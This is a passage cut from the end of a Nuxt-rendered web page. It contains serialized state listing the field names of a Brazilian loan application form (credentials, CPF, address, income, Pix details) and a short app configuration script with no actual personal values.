01451-001","#1bb99a",{"publicId":72,"credential":73,"address":75,"personalInfo":76,"loan":77},"",{"email":72,"password":72,"hasFacebook":74},false,{"street":72,"number":-1,"complement":-1,"neighborhood":72,"city":72,"state":72,"zipCode":72},{"fullName":72,"cpf":72,"birthDate":72,"phone":72,"motherName":72,"gender":72,"firstName":72,"lastName":72},{"desiredValue":78,"installmentCount":78,"income":78,"occupation":72,"loanReason":72,"educationLevel":72,"salaryDay":78,"pixKey":72,"pixBank":72,"primaryPayment":78,"secondaryPayment":78,"currencyFormat":79},0,{"desiredValue":72,"income":72,"primaryPayment":72,"secondaryPayment":72},{"fullName":72,"birthDate":72,"cpf":72,"motherName":72,"street":72,"number":72,"complement":72,"neighborhood":72,"city":72,"state":72,"zipCode":72,"shipping":72}]</script>
<script>window.__NUXT__={};window.__NUXT__.config={public:{apiBase:"https://api.hide-domain.com",adminId:1,projectId:1},app:{baseURL:"/",buildId:"f7f5e04f-036f-410e-b85c-b41773d9e483",buildAssetsDir:"/_nuxt/",cdnURL:""}}</script></body></html>